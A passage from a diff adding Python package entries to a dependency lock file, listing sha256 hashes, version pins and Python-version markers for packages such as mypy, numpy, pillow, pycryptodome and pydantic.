"sha256:5e96aad5ccda4718e0a229ed94b2024df75cc2d55575ba5762d31f5767b8767d" + ], + "markers": "python_version >= '3.6'", + "version": "==5.1.0" + }, + "model-bakery": { + "hashes": [ + "sha256:16178e608e2f414814e3383a9855e39c08810c9dee7b1d8e1354f1fdb7c013bc", + "sha256:c76813d8836ce339df4abd8648d6ed195fd0363f395dd1cb11b8a1898224e4e7" + ], + "markers": "python_version >= '3'", + "version": "==1.15.0" + }, + "mypy": { + "hashes": [ + "sha256:0af4f0e20706aadf4e6f8f8dc5ab739089146b83fd53cb4a7e0e850ef3de0bb6", + "sha256:15b5a824b58c7c822c51bc66308e759243c32631896743f030daf449fe3677f3", + "sha256:17455cda53eeee0a4adb6371a21dd3dbf465897de82843751cf822605d152c8c", + "sha256:2013226d17f20468f34feddd6aae4635a55f79626549099354ce641bc7d40262", + "sha256:24189f23dc66f83b839bd1cce2dfc356020dfc9a8bae03978477b15be61b062e", + "sha256:27a0f74a298769d9fdc8498fcb4f2beb86f0564bcdb1a37b58cbbe78e55cf8c0", + "sha256:28cea5a6392bb43d266782983b5a4216c25544cd7d80be681a155ddcdafd152d", + "sha256:448de661536d270ce04f2d7dddaa49b2fdba6e3bd8a83212164d4174ff43aa65", + "sha256:48525aec92b47baed9b3380371ab8ab6e63a5aab317347dfe9e55e02aaad22e8", + "sha256:5bc8d6bd3b274dd3846597855d96d38d947aedba18776aa998a8d46fabdaed76", + "sha256:5deb252fd42a77add936b463033a59b8e48eb2eaec2976d76b6878d031933fe4", + "sha256:5f546ac34093c6ce33f6278f7c88f0f147a4849386d3bf3ae193702f4fe31407", + "sha256:5fdd63e4f50e3538617887e9aee91855368d9fc1dea30da743837b0df7373bc4", + "sha256:65b122a993d9c81ea0bfde7689b3365318a88bde952e4dfa1b3a8b4ac05d168b", + "sha256:71a808334d3f41ef011faa5a5cd8153606df5fc0b56de5b2e89566c8093a0c9a", + "sha256:920169f0184215eef19294fa86ea49ffd4635dedfdea2b57e45cb4ee85d5ccaf", + "sha256:93a85495fb13dc484251b4c1fd7a5ac370cd0d812bbfc3b39c1bafefe95275d5", + "sha256:a2948c40a7dd46c1c33765718936669dc1f628f134013b02ff5ac6c7ef6942bf", + "sha256:c6c2ccb7af7154673c591189c3687b013122c5a891bb5651eca3db8e6c6c55bd", + "sha256:c96b8a0c019fe29040d520d9257d8c8f122a7343a8307bf8d6d4a43f5c5bfcc8", + "sha256:d42a98e76070a365a1d1c220fcac8aa4ada12ae0db679cb4d910fabefc88b994", + "sha256:dbeb24514c4acbc78d205f85dd0e800f34062efcc1f4a4857c57e4b4b8712bff", + "sha256:e60d0b09f62ae97a94605c3f73fd952395286cf3e3b9e7b97f60b01ddfbbda88", + "sha256:e64f48c6176e243ad015e995de05af7f22bbe370dbb5b32bd6988438ec873919", + "sha256:e831662208055b006eef68392a768ff83596035ffd6d846786578ba1714ba8f6", + "sha256:eda5c8b9949ed411ff752b9a01adda31afe7eae1e53e946dbdf9db23865e66c4" + ], + "index": "pypi", + "version": "==1.0.1" + }, + "mypy-extensions": { + "hashes": [ + "sha256:4392f6c0eb8a5668a69e23d168ffa70f0be9ccfd32b5cc2d26a34ae5b844552d", + "sha256:75dbf8955dc00442a438fc4d0666508a9a97b6bd41aa2f0ffe9d2f2725af0782" + ], + "markers": "python_version >= '3.5'", + "version": "==1.0.0" + }, + "mysqlclient": { + "hashes": [ + "sha256:004fe1d30d2c2ff8072f8ea513bcec235fd9b896f70dad369461d0ad7e570e98", + "sha256:04368445f9c487d8abb7a878e3d23e923e6072c04a6c320f9e0dc8a82efba14e", + "sha256:530ece9995a36cadb6211b9787f0c9e05cdab6702549bdb4236af5e9b535ed6a", + "sha256:5670679ff1be1cc3fef0fa81bf39f0cd70605ba121141050f02743eb878ac114", + "sha256:68837b6bb23170acffb43ae411e47533a560b6360c06dac39aa55700972c93b2", + "sha256:955dba905a7443ce4788c63fdb9f8d688316260cf60b20ff51ac3b1c77616ede", + "sha256:9c6b142836c7dba4f723bf9c93cc46b6e5081d65b2af807f400dda9eb85a16d0" + ], + "index": "pypi", + "version": "==2.2.0" + }, + "networkit": { + "hashes": [ + "sha256:0ff615156110510c3c44d538baf6f48caf06af0e0b9fe4e4e3a1c527d54598b7", + "sha256:1b223201f63d0f282af75ff44710d476b414c6229ad767b6ca9242c9d25f0abb", + "sha256:29a31a1ad709f802d113907ee47f481dee713b0a72ebe44fb0930e3a92be6536", + "sha256:34e42a1a6836149265478bb0a70e75382487188e29632811ee894e231fe25788", + "sha256:36caba5c75bec9dab52a2fc98b6f24ebf89ad061256051645d73c71d88c1fd92", + "sha256:45863a9a1d554266112cfda895c5bfc0b9c74a80ffbb1b4bfb9fbf5d03533bd6", + "sha256:5b56564385fd4b749f34a2745c06b06378e124c46082342bbe9dbf1a73c9d76e", + "sha256:67b71732595ee1f192d1ffa93420087ce0fef63bd59cf0c3484e30847c997044", + "sha256:842781097d8d6ee9db2d847d9d7de958e36cf3d4c20bf84db7ae63cae12d7479", + "sha256:85071cd39692e93b3882dfae642a71421d4f74bc40ecede3877272c945e4bbee", + "sha256:9282d27edef5d9376b3016c047829d696ced67566b76f79679940687f27aaaab", + "sha256:98acc4c94b19353ccb074e689dea91272e877c4fd6b60c69ee8869433f14a76c", + "sha256:ae4e85900c2eb682ebef31b6bed3c645946394c4490318d10a3c01ed12d46bdc", + "sha256:b0cd7134c37aaf0c4c1ab489a0bdd8cb53d369c37a2b8469c6ce8be0f270faa4", + "sha256:bbb523c1e00aa90e35fd29585c55ee2a2c58016e2764e2249b8ae218e0678fae", + "sha256:bd0b62b1fcd656a8d33ab677aea4e14af1a8b53b235a2316c88f7ee79e6da784" + ], + "index": "pypi", + "version": "==10.1" + }, + "networkx": { + "extras": [ + "all" + ], + "hashes": [ + "sha256:4f33f68cb2afcf86f28a45f43efc27a9386b535d567d2127f8f61d51dec58d36", + "sha256:de346335408f84de0eada6ff9fafafff9bcda11f0a0dfaa931133debb146ab61" + ], + "index": "pypi", + "version": "==3.1" + }, + "numpy": { + "hashes": [ + "sha256:0d60fbae8e0019865fc4784745814cff1c421df5afee233db6d88ab4f14655a2", + "sha256:1a1329e26f46230bf77b02cc19e900db9b52f398d6722ca853349a782d4cff55", + "sha256:1b9735c27cea5d995496f46a8b1cd7b408b3f34b6d50459d9ac8fe3a20cc17bf", + "sha256:2792d23d62ec51e50ce4d4b7d73de8f67a2fd3ea710dcbc8563a51a03fb07b01", + "sha256:3e0746410e73384e70d286f93abf2520035250aad8c5714240b0492a7302fdca", + "sha256:4c3abc71e8b6edba80a01a52e66d83c5d14433cbcd26a40c329ec7ed09f37901", + "sha256:5883c06bb92f2e6c8181df7b39971a5fb436288db58b5a1c3967702d4278691d", + "sha256:5c97325a0ba6f9d041feb9390924614b60b99209a71a69c876f71052521d42a4", + "sha256:60e7f0f7f6d0eee8364b9a6304c2845b9c491ac706048c7e8cf47b83123b8dbf", + "sha256:76b4115d42a7dfc5d485d358728cdd8719be33cc5ec6ec08632a5d6fca2ed380", + "sha256:7dc869c0c75988e1c693d0e2d5b26034644399dd929bc049db55395b1379e044", + "sha256:834b386f2b8210dca38c71a6e0f4fd6922f7d3fcff935dbe3a570945acb1b545", + "sha256:8b77775f4b7df768967a7c8b3567e309f617dd5e99aeb886fa14dc1a0791141f", + "sha256:90319e4f002795ccfc9050110bbbaa16c944b1c37c0baeea43c5fb881693ae1f", + "sha256:b79e513d7aac42ae918db3ad1341a015488530d0bb2a6abcbdd10a3a829ccfd3", + "sha256:bb33d5a1cf360304754913a350edda36d5b8c5331a8237268c48f91253c3a364", + "sha256:bec1e7213c7cb00d67093247f8c4db156fd03075f49876957dca4711306d39c9", + "sha256:c5462d19336db4560041517dbb7759c21d181a67cb01b36ca109b2ae37d32418", + "sha256:c5652ea24d33585ea39eb6a6a15dac87a1206a692719ff45d53c5282e66d4a8f", + "sha256:d7806500e4f5bdd04095e849265e55de20d8cc4b661b038957354327f6d9b295", + "sha256:db3ccc4e37a6873045580d413fe79b68e47a681af8db2e046f1dacfa11f86eb3", + "sha256:dfe4a913e29b418d096e696ddd422d8a5d13ffba4ea91f9f60440a3b759b0187", + "sha256:eb942bfb6f84df5ce05dbf4b46673ffed0d3da59f13635ea9b926af3deb76926", + "sha256:f08f2e037bba04e707eebf4bc934f1972a315c883a9e0ebfa8a7756eabf9e357", + "sha256:fd608e19c8d7c55021dffd43bfe5492fab8cc105cc8986f813f8c3c048b38760" + ], + "markers": "python_version >= '3.9'", + "version": "==1.25.2" + }, + "odfpy": { + "hashes": [ + "sha256:db766a6e59c5103212f3cc92ec8dd50a0f3a02790233ed0b52148b70d3c438ec", + "sha256:fc3b8d1bc098eba4a0fda865a76d9d1e577c4ceec771426bcb169a82c5e9dfe0" + ], + "version": "==1.4.1" + }, + "openpyxl": { + "hashes": [ + "sha256:40f568b9829bf9e446acfffce30250ac1fa39035124d55fc024025c41481c90f", + "sha256:8f3b11bd896a95468a4ab162fc4fcd260d46157155d1f8bfaabb99d88cfcf79f" + ], + "index": "pypi", + "version": "==3.0.9" + }, + "oss2": { + "hashes": [ + "sha256:8548ea7d43326f6fd679bc8b79b3a2dfbfe9c6a60ed57e2410818fec57023dda" + ], + "index": "pypi", + "version": "==2.13.1" + }, + "packaging": { + "hashes": [ + "sha256:dd47c42927d89ab911e606518907cc2d3a1f38bbd026385970643f9c5b8ecfeb", + "sha256:ef103e05f519cdc783ae24ea4e2e0f508a9c99b2d4969652eed6a2e1ea5bd522" + ], + "index": "pypi", + "version": "==21.3" + }, + "pep8": { + "hashes": [ + "sha256:b22cfae5db09833bb9bd7c8463b53e1a9c9b39f12e304a8d0bba729c501827ee", + "sha256:fe249b52e20498e59e0b5c5256aa52ee99fc295b26ec9eaa85776ffdb9fe6374" + ], + "index": "pypi", + "version": "==1.7.1" + }, + "pillow": { + "hashes": [ + "sha256:03150abd92771742d4a8cd6f2fa6246d847dcd2e332a18d0c15cc75bf6703040", + "sha256:073adb2ae23431d3b9bcbcff3fe698b62ed47211d0716b067385538a1b0f28b8", + "sha256:0b07fffc13f474264c336298d1b4ce01d9c5a011415b79d4ee5527bb69ae6f65", + "sha256:0b7257127d646ff8676ec8a15520013a698d1fdc48bc2a79ba4e53df792526f2", + "sha256:12ce4932caf2ddf3e41d17fc9c02d67126935a44b86df6a206cf0d7161548627", + "sha256:15c42fb9dea42465dfd902fb0ecf584b8848ceb28b41ee2b58f866411be33f07", + "sha256:18498994b29e1cf86d505edcb7edbe814d133d2232d256db8c7a8ceb34d18cef", + "sha256:1c7c8ae3864846fc95f4611c78129301e203aaa2af813b703c55d10cc1628535", + "sha256:22b012ea2d065fd163ca096f4e37e47cd8b59cf4b0fd47bfca6abb93df70b34c", + "sha256:276a5ca930c913f714e372b2591a22c4bd3b81a418c0f6635ba832daec1cbcfc", + "sha256:2e0918e03aa0c72ea56edbb00d4d664294815aa11291a11504a377ea018330d3", + "sha256:3033fbe1feb1b59394615a1cafaee85e49d01b51d54de0cbf6aa8e64182518a1", + "sha256:3168434d303babf495d4ba58fc22d6604f6e2afb97adc6a423e917dab828939c", + "sha256:32a44128c4bdca7f31de5be641187367fe2a450ad83b833ef78910397db491aa", + "sha256:3dd6caf940756101205dffc5367babf288a30043d35f80936f9bfb37f8355b32", + "sha256:40e1ce476a7804b0fb74bcfa80b0a2206ea6a882938eaba917f7a0f004b42502", + "sha256:41e0051336807468be450d52b8edd12ac60bebaa97fe10c8b660f116e50b30e4", + "sha256:4390e9ce199fc1951fcfa65795f239a8a4944117b5935a9317fb320e7767b40f", + "sha256:502526a2cbfa431d9fc2a079bdd9061a2397b842bb6bc4239bb176da00993812", + "sha256:51e0e543a33ed92db9f5ef69a0356e0b1a7a6b6a71b80df99f1d181ae5875636", + "sha256:57751894f6618fd4308ed8e0c36c333e2f5469744c34729a27532b3db106ee20", + "sha256:5d77adcd56a42d00cc1be30843d3426aa4e660cab4a61021dc84467123f7a00c", + "sha256:655a83b0058ba47c7c52e4e2df5ecf484c1b0b0349805896dd350cbc416bdd91", + "sha256:68943d632f1f9e3dce98908e873b3a090f6cba1cbb1b892a9e8d97c938871fbe", + "sha256:6c738585d7a9961d8c2821a1eb3dcb978d14e238be3d70f0a706f7fa9316946b", + "sha256:73bd195e43f3fadecfc50c682f5055ec32ee2c933243cafbfdec69ab1aa87cad", + "sha256:772a91fc0e03eaf922c63badeca75e91baa80fe2f5f87bdaed4280662aad25c9", + "sha256:77ec3e7be99629898c9a6d24a09de089fa5356ee408cdffffe62d67bb75fdd72", + "sha256:7db8b751ad307d7cf238f02101e8e36a128a6cb199326e867d1398067381bff4", + "sha256:801ec82e4188e935c7f5e22e006d01611d6b41661bba9fe45b60e7ac1a8f84de", + "sha256:82409ffe29d70fd733ff3c1025a602abb3e67405d41b9403b00b01debc4c9a29", + "sha256:828989c45c245518065a110434246c44a56a8b2b2f6347d1409c787e6e4651ee", + "sha256:829f97c8e258593b9daa80638aee3789b7df9da5cf1336035016d76f03b8860c", + "sha256:871b72c3643e516db4ecf20efe735deb27fe30ca17800e661d769faab45a18d7", + "sha256:89dca0ce00a2b49024df6325925555d406b14aa3efc2f752dbb5940c52c56b11", + "sha256:90fb88843d3902fe7c9586d439d1e8c05258f41da473952aa8b328d8b907498c", + "sha256:97aabc5c50312afa5e0a2b07c17d4ac5e865b250986f8afe2b02d772567a380c", + "sha256:9aaa107275d8527e9d6e7670b64aabaaa36e5b6bd71a1015ddd21da0d4e06448", + "sha256:9f47eabcd2ded7698106b05c2c338672d16a6f2a485e74481f524e2a23c2794b", + "sha256:a0a06a052c5f37b4ed81c613a455a81f9a3a69429b4fd7bb913c3fa98abefc20", + "sha256:ab388aaa3f6ce52ac1cb8e122c4bd46657c15905904b3120a6248b5b8b0bc228", + "sha256:ad58d27a5b0262c0c19b47d54c5802db9b34d38bbf886665b626aff83c74bacd", + "sha256:ae5331c23ce118c53b172fa64a4c037eb83c9165aba3a7ba9ddd3ec9fa64a699", + "sha256:af0372acb5d3598f36ec0914deed2a63f6bcdb7b606da04dc19a88d31bf0c05b", + "sha256:afa4107d1b306cdf8953edde0534562607fe8811b6c4d9a486298ad31de733b2", + "sha256:b03ae6f1a1878233ac620c98f3459f79fd77c7e3c2b20d460284e1fb370557d4", + "sha256:b0915e734b33a474d76c28e07292f196cdf2a590a0d25bcc06e64e545f2d146c", + "sha256:b4012d06c846dc2b80651b120e2cdd787b013deb39c09f407727ba90015c684f", + "sha256:b472b5ea442148d1c3e2209f20f1e0bb0eb556538690fa70b5e1f79fa0ba8dc2", + "sha256:b59430236b8e58840a0dfb4099a0e8717ffb779c952426a69ae435ca1f57210c", + "sha256:b90f7616ea170e92820775ed47e136208e04c967271c9ef615b6fbd08d9af0e3", + "sha256:b9a65733d103311331875c1dca05cb4606997fd33d6acfed695b1232ba1df193", + "sha256:bac18ab8d2d1e6b4ce25e3424f709aceef668347db8637c2296bcf41acb7cf48", + "sha256:bca31dd6014cb8b0b2db1e46081b0ca7d936f856da3b39744aef499db5d84d02", + "sha256:be55f8457cd1eac957af0c3f5ece7bc3f033f89b114ef30f710882717670b2a8", + "sha256:c7025dce65566eb6e89f56c9509d4f628fddcedb131d9465cacd3d8bac337e7e", + "sha256:c935a22a557a560108d780f9a0fc426dd7459940dc54faa49d83249c8d3e760f", + "sha256:dbb8e7f2abee51cef77673be97760abff1674ed32847ce04b4af90f610144c7b", + "sha256:e6ea6b856a74d560d9326c0f5895ef8050126acfdc7ca08ad703eb0081e82b74", + "sha256:ebf2029c1f464c59b8bdbe5143c79fa2045a581ac53679733d3a91d400ff9efb", + "sha256:f1ff2ee69f10f13a9596480335f406dd1f70c3650349e2be67ca3139280cade0" + ], + "index": "pypi", + "version": "==9.3.0" + }, + "prometheus-client": { + "hashes": [ + "sha256:21e674f39831ae3f8acde238afd9a27a37d0d2fb5a28ea094f0ce25d2cbf2091", + "sha256:e537f37160f6807b8202a6fc4764cdd19bac5480ddd3e0d463c3002b34462101" + ], + "markers": "python_version >= '3.6'", + "version": "==0.17.1" + }, + "prompt-toolkit": { + "hashes": [ + "sha256:04505ade687dc26dc4284b1ad19a83be2f2afe83e7a828ace0c72f3a1df72aac", + "sha256:9dffbe1d8acf91e3de75f3b544e4842382fc06c6babe903ac9acb74dc6e08d88" + ], + "markers": "python_full_version >= '3.7.0'", + "version": "==3.0.39" + }, + "pycodestyle": { + "hashes": [ + "sha256:259bcc17857d8a8b3b4a2327324b79e5f020a13c16074670f9c8c8f872ea76d0", + "sha256:5d1013ba8dc7895b548be5afb05740ca82454fd899971563d2ef625d090326f8" + ], + "markers": "python_version >= '3.8'", + "version": "==2.11.0" + }, + "pycparser": { + "hashes": [ + "sha256:8ee45429555515e1f6b185e78100aea234072576aa43ab53aefcae078162fca9", + "sha256:e644fdec12f7872f86c58ff790da456218b10f863970249516d60a5eaca77206" + ], + "version": "==2.21" + }, + "pycryptodome": { + "hashes": [ + "sha256:01489bbdf709d993f3058e2996f8f40fee3f0ea4d995002e5968965fa2fe89fb", + "sha256:10da29526a2a927c7d64b8f34592f461d92ae55fc97981aab5bbcde8cb465bb6", + "sha256:12600268763e6fec3cefe4c2dcdf79bde08d0b6dc1813887e789e495cb9f3403", + "sha256:157c9b5ba5e21b375f052ca78152dd309a09ed04703fd3721dce3ff8ecced148", + "sha256:16bfd98dbe472c263ed2821284118d899c76968db1a6665ade0c46805e6b29a4", + "sha256:363dd6f21f848301c2dcdeb3c8ae5f0dee2286a5e952a0f04954b82076f23825", + "sha256:3811e31e1ac3069988f7a1c9ee7331b942e605dfc0f27330a9ea5997e965efb2", + "sha256:422c89fd8df8a3bee09fb8d52aaa1e996120eafa565437392b781abec2a56e14", + "sha256:4604816adebd4faf8810782f137f8426bf45fee97d8427fa8e1e49ea78a52e2c", + "sha256:4944defabe2ace4803f99543445c27dd1edbe86d7d4edb87b256476a91e9ffa4", + "sha256:51eae079ddb9c5f10376b4131be9589a6554f6fd84f7f655180937f611cd99a2", + "sha256:53aee6be8b9b6da25ccd9028caf17dcdce3604f2c7862f5167777b707fbfb6cb", + "sha256:62a1e8847fabb5213ccde38915563140a5b338f0d0a0d363f996b51e4a6165cf", + "sha256:6f4b967bb11baea9128ec88c3d02f55a3e338361f5e4934f5240afcb667fdaec", + "sha256:78d863476e6bad2a592645072cc489bb90320972115d8995bcfbee2f8b209918", + "sha256:795bd1e4258a2c689c0b1f13ce9684fa0dd4c0e08680dcf597cf9516ed6bc0f3", + "sha256:7a3d22c8ee63de22336679e021c7f2386f7fc465477d59675caa0e5706387944", + "sha256:83c75952dcf4a4cebaa850fa257d7a860644c70a7cd54262c237c9f2be26f76e", + "sha256:928078c530da78ff08e10eb6cada6e0dff386bf3d9fa9871b4bbc9fbc1efe024", + "sha256:957b221d062d5752716923d14e0926f47670e95fead9d240fa4d4862214b9b2f", + "sha256:9ad6f09f670c466aac94a40798e0e8d1ef2aa04589c29faa5b9b97566611d1d1", + "sha256:9c8eda4f260072f7dbe42f473906c659dcbadd5ae6159dfb49af4da1293ae380", + "sha256:b1d9701d10303eec8d0bd33fa54d44e67b8be74ab449052a8372f12a66f93fb9", + "sha256:b6a610f8bfe67eab980d6236fdc73bfcdae23c9ed5548192bb2d530e8a92780e", + "sha256:c9adee653fc882d98956e33ca2c1fb582e23a8af7ac82fee75bd6113c55a0413", + "sha256:cb1be4d5af7f355e7d41d36d8eec156ef1382a88638e8032215c215b82a4b8ec", + "sha256:d1497a8cd4728db0e0da3c304856cb37c0c4e3d0b36fcbabcc1600f18504fc54", + "sha256:d20082bdac9218649f6abe0b885927be25a917e29ae0502eaf2b53f1233ce0c2", + "sha256:e8ad74044e5f5d2456c11ed4cfd3e34b8d4898c0cb201c4038fe41458a82ea27", + "sha256:f022a4fd2a5263a5c483a2bb165f9cb27f2be06f2f477113783efe3fe2ad887b", + "sha256:f21efb8438971aa16924790e1c3dba3a33164eb4000106a55baaed522c261acf", + "sha256:fc0a73f4db1e31d4a6d71b672a48f3af458f548059aa05e83022d5f61aac9c08" + ], + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4'", + "version": "==3.18.0" + }, + "pycryptodomex": { + "hashes": [ + "sha256:1ca8e1b4c62038bb2da55451385246f51f412c5f5eabd64812c01766a5989b4a", + "sha256:298c00ea41a81a491d5b244d295d18369e5aac4b61b77b2de5b249ca61cd6659", + "sha256:2aa887683eee493e015545bd69d3d21ac8d5ad582674ec98f4af84511e353e45", + "sha256:2ce76ed0081fd6ac8c74edc75b9d14eca2064173af79843c24fa62573263c1f2", + "sha256:3da13c2535b7aea94cc2a6d1b1b37746814c74b6e80790daddd55ca5c120a489", + "sha256:406ec8cfe0c098fadb18d597dc2ee6de4428d640c0ccafa453f3d9b2e58d29e2", + "sha256:4d0db8df9ffae36f416897ad184608d9d7a8c2b46c4612c6bc759b26c073f750", + "sha256:530756d2faa40af4c1f74123e1d889bd07feae45bac2fd32f259a35f7aa74151", + "sha256:77931df40bb5ce5e13f4de2bfc982b2ddc0198971fbd947776c8bb5050896eb2", + "sha256:797a36bd1f69df9e2798e33edb4bd04e5a30478efc08f9428c087f17f65a7045", + "sha256:8085bd0ad2034352eee4d4f3e2da985c2749cb7344b939f4d95ead38c2520859", + "sha256:8536bc08d130cae6dcba1ea689f2913dfd332d06113904d171f2f56da6228e89", + "sha256:a4d412eba5679ede84b41dbe48b1bed8f33131ab9db06c238a235334733acc5e", + "sha256:aebecde2adc4a6847094d3bd6a8a9538ef3438a5ea84ac1983fcb167db614461", + "sha256:b276cc4deb4a80f9dfd47a41ebb464b1fe91efd8b1b8620cf5ccf8b824b850d6", + "sha256:b5a185ae79f899b01ca49f365bdf15a45d78d9856f09b0de1a41b92afce1a07f", + "sha256:c4d8977ccda886d88dc3ca789de2f1adc714df912ff3934b3d0a3f3d777deafb", + "sha256:c5dd3ffa663c982d7f1be9eb494a8924f6d40e2e2f7d1d27384cfab1b2ac0662", + "sha256:ca88f2f7020002638276439a01ffbb0355634907d1aa5ca91f3dc0c2e44e8f3b", + "sha256:d2cce1c82a7845d7e2e8a0956c6b7ed3f1661c9acf18eb120fc71e098ab5c6fe", + "sha256:d709572d64825d8d59ea112e11cc7faf6007f294e9951324b7574af4251e4de8", + "sha256:da8db8374295fb532b4b0c467e66800ef17d100e4d5faa2bbbd6df35502da125", + "sha256:e36c7e3b5382cd5669cf199c4a04a0279a43b2a3bdd77627e9b89778ac9ec08c", + "sha256:e95a4a6c54d27a84a4624d2af8bb9ee178111604653194ca6880c98dcad92f48", + "sha256:ee835def05622e0c8b1435a906491760a43d0c462f065ec9143ec4b8d79f8bff", + "sha256:f75009715dcf4a3d680c2338ab19dac5498f8121173a929872950f4fb3a48fbf", + "sha256:f8524b8bc89470cec7ac51734907818d3620fb1637f8f8b542d650ebec42a126" + ], + "index": "pypi", + "version": "==3.14.1" + }, + "pydantic": { + "hashes": [ + "sha256:0fe8a415cea8f340e7a9af9c54fc71a649b43e8ca3cc732986116b3cb135d303", + "sha256:1289c180abd4bd4555bb927c42ee42abc3aee02b0fb2d1223fb7c6e5bef87dbe", + "sha256:1eb2085c13bce1612da8537b2d90f549c8cbb05c67e8f22854e201bde5d98a47", + "sha256:2031de0967c279df0d8a1c72b4ffc411ecd06bac607a212892757db7462fc494", + "sha256:2a7bac939fa326db1ab741c9d7f44c565a1d1e80908b3797f7f81a4f86bc8d33", + "sha256:2d5a58feb9a39f481eda4d5ca220aa8b9d4f21a41274760b9bc66bfd72595b86", + "sha256:2f9a6fab5f82ada41d56b0602606a5506aab165ca54e52bc4545028382ef1c5d", + "sha256:2fcfb5296d7877af406ba1547dfde9943b1256d8928732267e2653c26938cd9c", + "sha256:549a8e3d81df0a85226963611950b12d2d334f214436a19537b2efed61b7639a", + "sha256:598da88dfa127b666852bef6d0d796573a8cf5009ffd62104094a4fe39599565", + "sha256:5d1197e462e0364906cbc19681605cb7c036f2475c899b6f296104ad42b9f5fb", + "sha256:69328e15cfda2c392da4e713443c7dbffa1505bc9d566e71e55abe14c97ddc62", + "sha256:6a9dfa722316f4acf4460afdf5d41d5246a80e249c7ff475c43a3a1e9d75cf62", + "sha256:6b30bcb8cbfccfcf02acb8f1a261143fab622831d9c0989707e0e659f77a18e0", + "sha256:6c076be61cd0177a8433c0adcb03475baf4ee91edf5a4e550161ad57fc90f523", + "sha256:771735dc43cf8383959dc9b90aa281f0b6092321ca98677c5fb6125a6f56d58d", + "sha256:795e34e6cc065f8f498c89b894a3c6da294a936ee71e644e4bd44de048af1405", + "sha256:87afda5539d5140cb8ba9e8b8c8865cb5b1463924d38490d73d3ccfd80896b3f", + "sha256:8fb2aa3ab3728d950bcc885a2e9eff6c8fc40bc0b7bb434e555c215491bcf48b", + "sha256:a1fcb59f2f355ec350073af41d927bf83a63b50e640f4dbaa01053a28b7a7718", + "sha256:a5e7add47a5b5a40c49b3036d464e3c7802f8ae0d1e66035ea16aa5b7a3923ed", + "sha256:a73f489aebd0c2121ed974054cb2759af8a9f747de120acd2c3394cf84176ccb", + "sha256:ab26038b8375581dc832a63c948f261ae0aa21f1d34c1293469f135fa92972a5", + "sha256:b0d191db0f92dfcb1dec210ca244fdae5cbe918c6050b342d619c09d31eea0cc", + "sha256:b749a43aa51e32839c9d71dc67eb1e4221bb04af1033a32e3923d46f9effa942", + "sha256:b7ccf02d7eb340b216ec33e53a3a629856afe1c6e0ef91d84a4e6f2fb2ca70fe", + "sha256:ba5b2e6fe6ca2b7e013398bc7d7b170e21cce322d266ffcd57cca313e54fb246", + "sha256:ba5c4a8552bff16c61882db58544116d021d0b31ee7c66958d14cf386a5b5350", + "sha256:c79e6a11a07da7374f46970410b41d5e266f7f38f6a17a9c4823db80dadf4303", + "sha256:ca48477862372ac3770969b9d75f1bf66131d386dba79506c46d75e6b48c1e09", + "sha256:dea7adcc33d5d105896401a1f37d56b47d443a2b2605ff8a969a0ed5543f7e33", + "sha256:e0a16d274b588767602b7646fa05af2782576a6cf1022f4ba74cbb4db66f6ca8", + "sha256:e4129b528c6baa99a429f97ce733fff478ec955513630e61b49804b6cf9b224a", + "sha256:e5f805d2d5d0a41633651a73fa4ecdd0b3d7a49de4ec3fadf062fe16501ddbf1", + "sha256:ef6c96b2baa2100ec91a4b428f80d8f28a3c9e53568219b6c298c1125572ebc6", + "sha256:fdbdd1d630195689f325c9ef1a12900524dceb503b00a987663ff4f58669b93d" + ], + "markers": "python_version >= '3.7'", + "version": "==1.10.12" + }, + "pymysql": { + "hashes": [ + "sha256:41fc3a0c5013d5f039639442321185532e3e2c8924687abe6537de157d403641", + "sha256:816927a350f38d56072aeca5dfb10221fe1dc653745853d30a216637f5d7ad36" + ], + "index": "pypi", + "version": "==1.0.2" + }, + "pyparsing": { + "hashes": [ + "sha256:32c7c0b711493c72ff18a981d24f28aaf9c1fb7ed5e9667c9e84e3db623bdbfb", + "sha256:ede28a1a32462f5a9705e07aea48001a08f7cf81a021585011deba701581a0db" + ], + "markers": "python_full_version >= '3.6.8'", + "version": "==3.1.1" + }, + "pyre2": { + "hashes": [ + "sha256:18cd5d76973ee57232a5d851489c202105e4752aee6dcbd38742c0475f3f1c4e", + "sha256:1efec117f2543b38adcbe038a2ae156eb91b6ed8a73c998c3752a766d6241075", + "sha256:225784d7bd905bc3e87d4bbcc6ac4087ccea8905dd657273fd71bfb113e50e82", + "sha256:310d5c98495114692940ffa020aaeef1341427755b6ca5a17c63092060ed93dc", + "sha256:608558276d3539002ad6300d0b0a2b0941577fdea009715ff4d31052e05cb409", + "sha256:617c4d75b41b34afe7590e144efad1c564a8b49a1e0827872afc2243b24beada", + "sha256:6d8e550899886ee01f1b8149ba1c336e1c749cec2e33414815a76fb5649cdf67", + "sha256:6fe972c0cadec49a5a055690e5aa29f8aebaed0fa9b7d8d3530e33719b61f91c", + "sha256:7c398942c3467fe23b2dd4a11dd78da8aee774d0b481e84b1b208819ee724cca", + "sha256:961020835a3b805eed51a082e5effdccb51979c4efef2a17f17122967cb4749a", + "sha256:97de5d4cf7d8b9be7dbe0dc0941c4a6c1395fc598722d9644adc55427d3dd083", + "sha256:b87e9aeee74376210bd82c8328eb007b93378f3cd61fa6176161c3b9037e8474", + "sha256:c3b45f789374d0f95866330fcd34bb6b93705e8f5c276d9d70d318a227ba5954", + "sha256:cc180989186f05b75020b53c79059c338e9e1940d325fc945c84aab2b5c57525", + "sha256:ebe92a3222f2f6f176eeb3859638734e4f9a82d5940ad7d6f0c1288153c70ce2", + "sha256:f3467dd9a4c8100f6406bc6277d945a13b7fd7c4426d2415564de1324b5db94f", + "sha256:f3ae7b087abcbc4b910d535c2fb877ef452b61d2514a63fd15b8b020b51fe4b5" + ], + "index": "pypi", + "version": "==0.3.6" + }, + "pyrsistent": { + "hashes": [ + "sha256:06579d46d8ad69529b28f88711191a7fe7103c92d04a9f338dc754f71b92efa0", + "sha256:1d0620474d509172e1c50b79d5626bfe1899f174bf650186a50c6ce31289ff52", + "sha256:2032d971711643049b4f2c3ca5155a855d507d73bad26dac8d4349e5c5dd6758", + "sha256:2c641111c3f110379bb9001dbb26b34eb8cafab3d0fa855dc161c391461a4aab", + "sha256:327f99800d04a9abcf580daecfd6dd4bfdb4a7e61c71bf2cd1189ef1ca44bade", + "sha256:39f15ad754384e744ac8b00805913bfa66c41131faaa3e4c45c4af0731f3e8f6", + "sha256:4c58bd93c4d502f52938fccdbe6c9d70df3a585c6b39d900fab5f76b604282aa", + "sha256:62a41037387ae849a493cd945e22b34d167a843d57f75b07dbfad6d96cef485c", + "sha256:62b704f18526a8fc243152de8f3f40ae39c5172baff10f50c0c5d5331d6f2342", + 